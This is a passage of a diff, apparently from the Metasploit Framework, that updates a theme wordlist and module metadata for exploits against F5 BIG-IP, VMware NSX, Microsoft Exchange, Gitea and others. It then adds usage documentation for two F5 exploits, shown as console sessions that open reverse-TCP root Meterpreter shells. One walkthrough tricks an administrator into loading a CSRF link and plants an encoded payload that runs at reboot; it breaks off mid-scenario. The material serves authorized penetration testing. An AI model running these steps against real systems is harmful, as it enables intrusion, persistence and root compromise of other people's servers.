 yoga
 yoga-coach
 yoga-fitness
+yoga-park
 yoga-studio
 yoga_guru
 yogaclub-lite
@@ -22359,7 +23795,9 @@ yomel
 yonarex
 yoneko
 yoo-developer
+yordered-desktop
 york-lite
+york-press
 yosemite
 yosemite-lite
 yosemite-lite1
@@ -22387,8 +23825,13 @@ yugen
 yui
 yui-grid-css
 yuiyui
+yuki
+yuki-agency
+yuki-magazine
 yukti
 yule
+yuma
+yuma-personal
 yume
 yume-tan
 yummy
@@ -22463,6 +23906,7 @@ zeestyle
 zeestylepro
 zeesynergie
 zeetasty
+zeever
 zeevision
 zeko-lite
 zelia
@@ -22485,6 +23929,7 @@ zenga-club
 zengardenwedding
 zenhabits-reloaded
 zenimalist
+zenithwp
 zenlife
 zenlite
 zenmacrame
@@ -22533,6 +23978,7 @@ zetaone
 zeus
 zfirst
 zgrey
+zheme
 zhuti
 zica-lite-one-page
 zifer-child
@@ -22570,7 +24016,9 @@ zm-tech-black-red
 zm-theme
 zmartoffcial
 zmooncake
+zmt-modular
 znktheme-uri-httpssketchthemes-compremium-themesappointment-booking-wordpress-theme-for-consultants
+zodiac-astrology
 zodiac-lite
 zoe
 zoko
@@ -5220,7 +5220,7 @@

    ],
    "targets": null,
-    "mod_time": "2022-10-28 09:19:43 +0000",
+    "mod_time": "2022-11-14 12:27:38 +0000",
    "path": "/modules/auxiliary/admin/ldap/rbcd.rb",
    "is_install_path": true,
    "ref_name": "admin/ldap/rbcd",
@@ -19696,7 +19696,7 @@

    ],
    "targets": null,
-    "mod_time": "2022-11-07 10:28:43 +0000",
+    "mod_time": "2022-11-14 12:27:38 +0000",
    "path": "/modules/auxiliary/gather/ldap_esc_vulnerable_cert_finder.rb",
    "is_install_path": true,
    "ref_name": "gather/ldap_esc_vulnerable_cert_finder",
@@ -35412,7 +35412,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2022-01-23 15:28:32 +0000",
+    "mod_time": "2022-11-27 15:35:34 +0000",
    "path": "/modules/auxiliary/scanner/http/tomcat_mgr_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/tomcat_mgr_login",
@@ -45943,7 +45943,7 @@

    ],
    "targets": null,
-    "mod_time": "2021-07-19 14:47:39 +0000",
+    "mod_time": "2022-10-15 16:42:30 +0000",
    "path": "/modules/auxiliary/scanner/smb/impacket/wmiexec.py",
    "is_install_path": true,
    "ref_name": "scanner/smb/impacket/wmiexec",
@@ -47037,7 +47037,7 @@

    ],
    "targets": null,
-    "mod_time": "2022-01-23 15:28:32 +0000",
+    "mod_time": "2022-11-01 14:22:49 +0000",
    "path": "/modules/auxiliary/scanner/snmp/snmp_enum.rb",
    "is_install_path": true,
    "ref_name": "scanner/snmp/snmp_enum",
@@ -47117,7 +47117,7 @@

    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2022-11-01 14:22:49 +0000",
    "path": "/modules/auxiliary/scanner/snmp/snmp_enumshares.rb",
    "is_install_path": true,
    "ref_name": "scanner/snmp/snmp_enumshares",
@@ -47155,7 +47155,7 @@

    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2022-11-01 14:22:49 +0000",
    "path": "/modules/auxiliary/scanner/snmp/snmp_enumusers.rb",
    "is_install_path": true,
    "ref_name": "scanner/snmp/snmp_enumusers",
@@ -61839,6 +61839,125 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_linux/http/f5_icontrol_rpmspec_rce_cve_2022_41800": {
+    "name": "F5 BIG-IP iControl Authenticated RCE via RPM Creator",
+    "fullname": "exploit/linux/http/f5_icontrol_rpmspec_rce_cve_2022_41800",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2022-11-16",
+    "type": "exploit",
+    "author": [
+      "Ron Bowes"
+    ],
+    "description": "This module exploits a newline injection into an RPM .rpmspec file\n          that permits authenticated users to remotely execute commands.\n\n          Successful exploitation results in remote code execution\n          as the root user.",
+    "references": [
+      "CVE-2022-41800",
+      "URL-https://www.rapid7.com/blog/post/2022/11/16/cve-2022-41622-and-cve-2022-41800-fixed-f5-big-ip-and-icontrol-rest-vulnerabilities-and-exposures/",
+      "URL-https://support.f5.com/csp/article/K97843387",
+      "URL-https://support.f5.com/csp/article/K13325942"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd",
+    "rport": 443,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Default"
+    ],
+    "mod_time": "2022-11-23 10:42:07 +0000",
+    "path": "/modules/exploits/linux/http/f5_icontrol_rpmspec_rce_cve_2022_41800.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/f5_icontrol_rpmspec_rce_cve_2022_41800",
+    "check": false,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": true
+  },
+  "exploit_linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622": {
+    "name": "F5 BIG-IP iControl CSRF File Write SOAP API",
+    "fullname": "exploit/linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2022-11-16",
+    "type": "exploit",
+    "author": [
+      "Ron Bowes"
+    ],
+    "description": "This module exploits a cross-site request forgery (CSRF) vulnerability\n          in F5 Big-IP's iControl interface to write an arbitrary file to the\n          filesystem.\n\n          While any file can be written to any location as root, the\n          exploitability is limited by SELinux; the vast majority of writable\n          locations are unavailable. By default, we write to a script that\n          executes at reboot, which means the payload will execute the next time\n          the server boots.\n\n          An alternate target - Login - will add a backdoor that executes next\n          time a user logs in interactively. This overwrites a file,\n          but we restore it when we get a session\n\n          Note that because this is a CSRF vulnerability, it starts a web\n          server, but an authenticated administrator must visit the site, which\n          redirects them to the target.",
+    "references": [
+      "CVE-2022-41622",
+      "URL-https://github.com/rbowes-r7/refreshing-soap-exploit",
+      "URL-https://www.rapid7.com/blog/post/2022/11/16/cve-2022-41622-and-cve-2022-41800-fixed-f5-big-ip-and-icontrol-rest-vulnerabilities-and-exposures/",
+      "URL-https://support.f5.com/csp/article/K97843387",
+      "URL-https://support.f5.com/csp/article/K94221585",
+      "URL-https://support.f5.com/csp/article/K05403841"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd",
+    "rport": 443,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Restart",
+      "Login",
+      "Custom"
+    ],
+    "mod_time": "2022-11-18 16:18:25 +0000",
+    "path": "/modules/exploits/linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": true
+  },
  "exploit_linux/http/flir_ax8_unauth_rce_cve_2022_37061": {
    "name": "FLIR AX8 unauthenticated RCE",
    "fullname": "exploit/linux/http/flir_ax8_unauth_rce_cve_2022_37061",
@@ -69822,6 +69941,72 @@
    "session_types": false,
    "needs_cleanup": true
  },
+  "exploit_linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144": {
+    "name": "VMware NSX Manager XStream unauthenticated RCE",
+    "fullname": "exploit/linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2022-10-25",
+    "type": "exploit",
+    "author": [
+      "h00die-gr3y",
+      "Sina Kheirkhah",
+      "Steven Seeley"
+    ],
+    "description": "VMware Cloud Foundation (NSX-V) contains a remote code execution vulnerability via XStream open source library.\n          VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.8.\n          Due to an unauthenticated endpoint that leverages XStream for input serialization in VMware Cloud Foundation (NSX-V),\n          a malicious actor can get remote code execution in the context of 'root' on the appliance.\n          VMware Cloud Foundation 3.x and more specific NSX Manager Data Center for vSphere up to and including version 6.4.13\n          are vulnerable to Remote Command Injection.\n\n          This module exploits the vulnerability to upload and execute payloads gaining root privileges.",
+    "references": [
+      "CVE-2021-39144",
+      "URL-https://www.vmware.com/security/advisories/VMSA-2022-0027.html",
+      "URL-https://kb.vmware.com/s/article/89809",
+      "URL-https://srcincite.io/blog/2022/10/25/eat-what-you-kill-pre-authenticated-rce-in-vmware-nsx-manager.html",
+      "URL-https://attackerkb.com/topics/ngprN6bu76/cve-2021-39144"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd, x86, x64",
+    "rport": 443,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Unix (In-Memory)",
+      "Linux Dropper"
+    ],
+    "mod_time": "2022-11-12 10:21:43 +0000",
+    "path": "/modules/exploits/linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_linux/http/vmware_vcenter_analytics_file_upload": {
    "name": "VMware vCenter Server Analytics (CEIP) Service File Upload",
    "fullname": "exploit/linux/http/vmware_vcenter_analytics_file_upload",
@@ -73866,7 +74051,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2022-10-08 09:50:25 +0000",
+    "mod_time": "2022-11-25 15:13:57 +0000",
    "path": "/modules/exploits/linux/local/polkit_dbus_auth_bypass.rb",
    "is_install_path": true,
    "ref_name": "linux/local/polkit_dbus_auth_bypass",
@@ -73978,7 +74163,7 @@
    "targets": [
      "Auto"
    ],
-    "mod_time": "2021-02-17 12:33:59 +0000",
+    "mod_time": "2022-11-12 16:19:50 +0000",
    "path": "/modules/exploits/linux/local/ptrace_traceme_pkexec_helper.rb",
    "is_install_path": true,
    "ref_name": "linux/local/ptrace_traceme_pkexec_helper",
@@ -83742,6 +83927,67 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_multi/http/churchinfo_upload_exec": {
+    "name": "ChurchInfo 1.2.13-1.3.0 Authenticated RCE",
+    "fullname": "exploit/multi/http/churchinfo_upload_exec",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2021-10-30",
+    "type": "exploit",
+    "author": [
+      "m4lwhere <m4lwhere@protonmail.com>"
+    ],
+    "description": "This module exploits the logic in the CartView.php page when crafting a draft email with an attachment.\n          By uploading an attachment for a draft email, the attachment will be placed in the /tmp_attach/ folder of the\n          ChurchInfo web server, which is accessible over the web by any user. By uploading a PHP attachment and\n          then browsing to the location of the uploaded PHP file on the web server, arbitrary code\n          execution as the web daemon user (e.g. www-data) can be achieved.",
+    "references": [
+      "URL-http://www.churchdb.org/",
+      "URL-http://sourceforge.net/projects/churchinfo/",
+      "CVE-2021-43258"
+    ],
+    "platform": "PHP",
+    "arch": "php",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Automatic Targeting"
+    ],
+    "mod_time": "2022-11-18 18:04:51 +0000",
+    "path": "/modules/exploits/multi/http/churchinfo_upload_exec.rb",
+    "is_install_path": true,
+    "ref_name": "multi/http/churchinfo_upload_exec",
+    "check": true,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "CRASH_SAFE"
+      ],
+      "Reliability": [
+        "REPEATABLE_SESSION"
+      ],
+      "SideEffects": [
+        "ARTIFACTS_ON_DISK",
+        "IOC_IN_LOGS"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": true
+  },
  "exploit_multi/http/cisco_dcnm_upload": {
    "name": "Cisco Prime Data Center Network Manager Arbitrary File Upload",
    "fullname": "exploit/multi/http/cisco_dcnm_upload",
@@ -85223,6 +85469,70 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_multi/http/gitea_git_fetch_rce": {
+    "name": "Gitea Git Fetch Remote Code Execution",
+    "fullname": "exploit/multi/http/gitea_git_fetch_rce",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2022-05-16",
+    "type": "exploit",
+    "author": [
+      "wuhan005",
+      "li4n0",
+      "krastanoel"
+    ],
+    "description": "This module exploits Git fetch command in Gitea repository migration\n          process that leads to a remote command execution on the system.\n          This vulnerability affect Gitea before 1.16.7 version.",
+    "references": [
+      "CVE-2022-30781",
+      "URL-https://tttang.com/archive/1607/"
+    ],
+    "platform": "Linux,Unix,Windows",
+    "arch": "cmd",
+    "rport": 3000,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Unix Command",
+      "Linux Dropper",
+      "Windows Command",
+      "Windows Dropper"
+    ],
+    "mod_time": "2022-11-17 12:25:52 +0000",
+    "path": "/modules/exploits/multi/http/gitea_git_fetch_rce.rb",
+    "is_install_path": true,
+    "ref_name": "multi/http/gitea_git_fetch_rce",
+    "check": true,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_multi/http/gitea_git_hooks_rce": {
    "name": "Gitea Git Hooks Remote Code Execution",
    "fullname": "exploit/multi/http/gitea_git_hooks_rce",
@@ -98240,7 +98550,7 @@
      "Apache OpenOffice on Windows (PSH)",
      "Apache OpenOffice on Linux/OSX (Python)"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2022-11-30 22:10:18 +0000",
    "path": "/modules/exploits/multi/misc/openoffice_document_macro.rb",
    "is_install_path": true,
    "ref_name": "multi/misc/openoffice_document_macro",
@@ -104248,7 +104558,7 @@
      "Unix Command",
      "BSD Dropper"
    ],
-    "mod_time": "2022-10-12 19:23:59 +0000",
+    "mod_time": "2022-10-24 14:17:21 +0000",
    "path": "/modules/exploits/unix/http/pfsense_pfblockerng_webshell.rb",
    "is_install_path": true,
    "ref_name": "unix/http/pfsense_pfblockerng_webshell",
@@ -141765,6 +142075,79 @@
    "session_types": false,
    "needs_cleanup": true
  },
+  "exploit_windows/http/exchange_proxynotshell_rce": {
+    "name": "Microsoft Exchange ProxyNotShell RCE",
+    "fullname": "exploit/windows/http/exchange_proxynotshell_rce",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2022-09-28",
+    "type": "exploit",
+    "author": [
+      "Orange Tsai",
+      "Spencer McIntyre",
+      "DA-0x43-Dx4-DA-Hx2-Tx2-TP-S-Q",
+      "Piotr Bazydło",
+      "Rich Warren",
+      "Soroush Dalili"
+    ],
+    "description": "This module chains two vulnerabilities on Microsoft Exchange Server\n          that, when combined, allow an authenticated attacker to interact with\n          the Exchange Powershell backend (CVE-2022-41040), where a\n          deserialization flaw can be leveraged to obtain code execution\n          (CVE-2022-41082). This exploit only support Exchange Server 2019.\n\n          These vulnerabilities were patched in November 2022.",
+    "references": [
+      "CVE-2022-41040",
+      "CVE-2022-41082",
+      "URL-https://www.zerodayinitiative.com/blog/2022/11/14/control-your-types-or-get-pwned-remote-code-execution-in-exchange-powershell-backend",
+      "URL-https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/",
+      "URL-https://doublepulsar.com/proxynotshell-the-story-of-the-claimed-zero-day-in-microsoft-exchange-5c63d963a9e9",
+      "URL-https://rw.md/2022/11/09/ProxyNotRelay.html"
+    ],
+    "platform": "Windows",
+    "arch": "cmd, x64, x86",
+    "rport": 443,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Windows Dropper",
+      "Windows Command"
+    ],
+    "mod_time": "2022-11-28 10:06:14 +0000",
+    "path": "/modules/exploits/windows/http/exchange_proxynotshell_rce.rb",
+    "is_install_path": true,
+    "ref_name": "windows/http/exchange_proxynotshell_rce",
+    "check": true,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "ioc-in-logs"
+      ],
+      "AKA": [
+        "ProxyNotShell"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_windows/http/exchange_proxyshell_rce": {
    "name": "Microsoft Exchange ProxyShell RCE",
    "fullname": "exploit/windows/http/exchange_proxyshell_rce",
@@ -141818,7 +142201,7 @@
      "Windows Dropper",
      "Windows Command"
    ],
-    "mod_time": "2021-11-10 11:12:38 +0000",
+    "mod_time": "2022-11-28 10:16:55 +0000",
    "path": "/modules/exploits/windows/http/exchange_proxyshell_rce.rb",
    "is_install_path": true,
    "ref_name": "windows/http/exchange_proxyshell_rce",
@@ -161264,6 +161647,58 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_windows/misc/remote_control_collection_rce": {
+    "name": "Remote Control Collection RCE",
+    "fullname": "exploit/windows/misc/remote_control_collection_rce",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2022-09-20",
+    "type": "exploit",
+    "author": [
+      "h00die",
+      "H4rk3nz0"
+    ],
+    "description": "This module utilizes the Remote Control Server's, part\n          of the Remote Control Collection by Steppschuh, protocol\n          to deploy a payload and run it from the server.  This module will only deploy\n          a payload if the server is set without a password (default).\n          Tested against 3.1.1.12, current at the time of module writing",
+    "references": [
+      "URL-http://remote-control-collection.com",
+      "URL-https://github.com/H4rk3nz0/PenTesting/blob/main/Exploits/remote%20control%20collection/remote-control-collection-rce.py"
+    ],
+    "platform": "Windows",
+    "arch": "x64, x86",
+    "rport": 1926,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "default"
+    ],
+    "mod_time": "2022-10-28 15:03:39 +0000",
+    "path": "/modules/exploits/windows/misc/remote_control_collection_rce.rb",
+    "is_install_path": true,
+    "ref_name": "windows/misc/remote_control_collection_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "screen-effects"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": true
+  },
  "exploit_windows/misc/remote_mouse_rce": {
    "name": "Remote Mouse RCE",
    "fullname": "exploit/windows/misc/remote_mouse_rce",
@@ -205820,7 +206255,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-08-09 15:53:58 +0000",
+    "mod_time": "2022-11-21 00:46:44 +0000",
    "path": "/modules/post/linux/gather/enum_network.rb",
    "is_install_path": true,
    "ref_name": "linux/gather/enum_network",
@@ -205873,7 +206308,7 @@
    "needs_cleanup": null
  },
  "post_linux/gather/enum_psk": {
-    "name": "Linux Gather 802-11-Wireless-Security Credentials",
+    "name": "Linux Gather NetworkManager 802-11-Wireless-Security Credentials",
    "fullname": "post/linux/gather/enum_psk",
    "aliases": [

@@ -205884,7 +206319,7 @@
    "author": [
      "Cenk Kalpakoglu"
    ],
-    "description": "This module collects 802-11-Wireless-Security credentials such as\n          Access-Point name and Pre-Shared-Key from your target CLIENT Linux\n          machine using /etc/NetworkManager/system-connections/ files.\n          The module gathers NetworkManager's plaintext \"psk\" information.",
+    "description": "This module collects 802-11-Wireless-Security credentials such as\n          Access-Point name and Pre-Shared-Key from Linux NetworkManager\n          connection configuration files.",
    "references": [

    ],
@@ -205894,7 +206329,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2022-11-21 00:28:34 +0000",
    "path": "/modules/post/linux/gather/enum_psk.rb",
    "is_install_path": true,
    "ref_name": "linux/gather/enum_psk",
@@ -205902,6 +206337,15 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+
+      ]
    },
    "session_types": [
      "shell",
@@ -206408,7 +206852,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-08-15 18:10:44 +0000",
+    "mod_time": "2022-11-22 11:55:47 +0000",
    "path": "/modules/post/linux/gather/tor_hiddenservices.rb",
    "is_install_path": true,
    "ref_name": "linux/gather/tor_hiddenservices",
@@ -0,0 +1,61 @@
+## Vulnerable Application
+
+The vulnerable application is F5 Big-IP version 17.0.0.1 and below. It can be
+downloaded as a VMWare image for free (you have to create an account) from
+https://downloads.f5.com. You can register for a free 30-day trial if you like,
+but it's not required to test this.
+
+Boot the VM and set an admin password by logging in with the default credentials
+(admin / admin). You'll need that password.
+
+## Verification Steps
+
+1. Install the application
+2. Start `msfconsole`
+3. Do: `use exploit/linux/http/f5_icontrol_rpmspec_rce_cve_2022_41800`
+4. Do `set RHOST <target>` / `set HttpUsername admin` / `set HttpPassword <thepasswordyouchose>`
+5. Do: `run`
+6. You should get a session
+
+## Options
+
+### `HttpUsername` / `HttpPassword`
+
+The account to authorize as - requires console access. The `admin` account (which
+is the default `HttpUsername`) works great, if you have the password.
+
+## Scenarios
+
+### F5 Big-IP 17.0.0.1
+
+This should be the normal experience:
+
+```
+msf6 > use exploit/linux/http/f5_icontrol_rpmspec_rce_cve_2022_41800
+[*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp
+
+msf6 exploit(linux/http/f5_icontrol_rpmspec_rce_cve_2022_41800) > set RHOST 10.0.0.162
+RHOST => 10.0.0.162
+
+msf6 exploit(linux/http/f5_icontrol_rpmspec_rce_cve_2022_41800) > set LHOST 10.0.0.179
+LHOST => 10.0.0.179
+
+msf6 exploit(linux/http/f5_icontrol_rpmspec_rce_cve_2022_41800) > set HttpPassword iagotestbigip
+HttpPassword => mybigippassword
+
+msf6 exploit(linux/http/f5_icontrol_rpmspec_rce_cve_2022_41800) > set VERBOSE true
+VERBOSE => true
+
+msf6 exploit(linux/http/f5_icontrol_rpmspec_rce_cve_2022_41800) > exploit
+[*] Started reverse TCP handler on 10.0.0.179:4444 
+[*] Creating an .rpmspec file on the target...
+[*] Created spec file: /var/config/rest/node/tmp/2fadbb5d-ed94-4b23-ba57-2f0d273d2bdc.spec
+[*] Building the RPM to trigger the payload...
+[*] Sending stage (40168 bytes) to 10.0.0.162
+[+] Deleted /var/config/rest/node/tmp/2fadbb5d-ed94-4b23-ba57-2f0d273d2bdc.spec
+[+] Deleted /var/config/rest/node/tmp/RPMS/noarch/wOXt3-4.1.3-0.8.6.noarch.rpm
+[*] Meterpreter session 2 opened (10.0.0.179:4444 -> 10.0.0.162:38556) at 2022-11-14 15:14:23 -0800
+
+meterpreter > getuid
+Server username: root
+```
@@ -0,0 +1,217 @@
+## Vulnerable Application
+
+The vulnerable application is F5 Big-IP version 17.0.0.1 and below. It can be
+downloaded as a VMWare image for free (you have to create an account) from
+https://downloads.f5.com. You can register for a free 30-day trial if you like,
+but it's not required to test this.
+
+Boot the VM and set an admin password by logging in with the default credentials
+(admin / admin). You'll need that password.
+
+## Verification Steps
+
+This is a CSRF vuln, so it requires a browser in addition to msf:
+
+1. Install the application
+2. Start `msfconsole`
+3. Do: `use exploit/linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622`
+4. Do `set TARGET_HOST <target>` / `set LHOST <yourtest>`
+5. Do: `run`
+6. You should get a url such as: `http://10.0.0.179:8080/ddgjZO`
+7. Open a browser and visit that URL
+8. If you don't already have an HTTP Basic session, it'll ask for your credentials (the `admin` account from earlier works great)
+
+## Options
+
+### `TARGET_HOST` / `TARGET_URI` / `TARGET_SSL`
+
+These are the target that the user will be redirected to
+
+### `FILENAME`
+
+If the `TARGET` is `2` (`Custom`), the file that will be overwritten with the payload
+
+## Scenarios
+
+### F5 Big-IP 17.0.0.1 - Target 0 (Restart)
+
+Start the listener:
+
+```
+msf6 > use exploit/linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622
+[*] Using configured payload cmd/unix/python/meterpreter/reverse_tcp
+
+msf6 exploit(linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622) > set TARGET_HOST 10.0.0.162
+TARGET_HOST => 10.0.0.162
+
+msf6 exploit(linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622) > set LHOST 10.0.0.179
+LHOST => 10.0.0.179
+
+msf6 exploit(linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622) > exploit
+[*] Started reverse TCP handler on 10.0.0.179:4444 
+[+] Starting HTTP server; an administrator with an active HTTP Basic session will need to load the URL below
+[*] Using URL: http://10.0.0.179:8080/LXsNzhG6zMdQ
+[*] Server started.
+```
+
+Then, a legit user that has HTTP Basic authentication (or who can be tricked
+into performing HTTP Basic authentication) needs to visit that URL. When any
+user connects, they'll be redirected to the SOAP endpoint and you'll see:
+
+```
+msf6 exploit(linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622) > exploit
+
+[*] Started reverse TCP handler on 10.0.0.179:4444 
+[+] Starting HTTP server; an administrator with an active HTTP Basic session will need to load the URL below
+[*] Using URL: http://10.0.0.179:8080/LXsNzhG6zMdQ
+[*] Server started.
+
+[... wait for a user to visit the URL ...]
+
+[*] Redirecting the admin to overwrite /shared/f5_update_action; if successful, your session will come approximately 2 minutes after the target is rebooted
+```
+
+We have no way to tell whether this was successful; however, if we already have
+access to the target (ie, if you're testing this), we can check if the file was
+successfully planted:
+
+```
+[root@bigip:Active:Standalone] config # cat /shared/f5_update_action 
+UpdateAction
+https://localhost/success`echo exec\(__import__\(\'base64\'\).b64decode[...]
+https://localhost/error
+0
+0
+0
+0
+```
+
+The code planted there will activate at reboot. So, ...wait till the target
+reboots. Perhaps when they update! Again, if you have shell access, you can
+check the log file when it boots:
+
+```
+[root@bigip:INOPERATIVE:] config # tail -f /var/log/f5_update_checker.out
+[Mon Nov 14 15:26:02 2022] f5em_callback [INFO]: EM callback file found -- parsing
+[Mon Nov 14 15:26:02 2022] f5em_callback [INFO]: EM callback file action: "UpdateAction"
+[Mon Nov 14 15:26:02 2022] f5em_callback [INFO]: EM callback file success URL: "https://localhost/success`echo exec\(__import__\(\'base64\'\).b64decode[...]
+[Mon Nov 14 15:26:02 2022] f5em_callback [INFO]: EM callback file failure URL: "https://localhost/error"
+[Mon Nov 14 15:26:02 2022] f5em_callback [INFO]: EM callback file rebootOnSuccess flag: "8"
+[Mon Nov 14 15:26:02 2022] f5em_callback [INFO]: EM callback file rebootOnSuccess slot: "0"
+[Mon Nov 14 15:26:02 2022] f5em_callback [INFO]: EM callback file rebootOnFailure flag: "0"
+[Mon Nov 14 15:26:02 2022] f5em_callback [INFO]: EM callback file rebootOnFailure slot: "0"
+[Mon Nov 14 15:26:02 2022] f5em_callback [INFO]: Executing EM action: UpdateAction
+[Mon Nov 14 15:26:02 2022] f5em_callback [INFO]: Sleeping for 2 minutes before first attempt.
+[...wait 2 minutes...]
+[Mon Nov 14 15:28:02 2022] f5em_callback [INFO]: Finished sleeping.
+[Mon Nov 14 15:28:02 2022] f5em_callback [INFO]: Attempting to connect to EM server: "https://localhost/success`echo exec\(__import__\(\'base64\'\).b64decode[...]
+```
+
+And, on Metasploit:
+
+```
+[*] Redirecting the admin to overwrite /shared/f5_update_action; if successful, your session will come approximately 2 minutes after the target is rebooted
+[...wait 2 minutes...]
+[*] Sending stage (40164 bytes) to 10.0.0.162
+[+] Deleted /var/log/f5_update_checker.out
+[*] Meterpreter session 1 opened (10.0.0.179:4444 -> 10.0.0.162:51388) at 2022-11-14 15:28:04 -0800
+
+msf6 exploit(linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622) > sessions -i 1
+[*] Starting interaction with 1...
+
+meterpreter > getuid
+Server username: root
+```
+
+### F5 Big-IP 17.0.0.1 - Target 1 (Login)
+
+This works similarly.. use the module, set the `TARGET_HOST`, and set the
+`TARGET` to `1`:
+
+```
+msf6 > use exploit/linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622
+[*] Using configured payload cmd/unix/python/meterpreter/reverse_tcp
+
+msf6 exploit(linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622) > set TARGET_HOST 10.0.0.162
+TARGET_HOST => 10.0.0.162
+
+msf6 exploit(linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622) > set LHOST 10.0.0.179
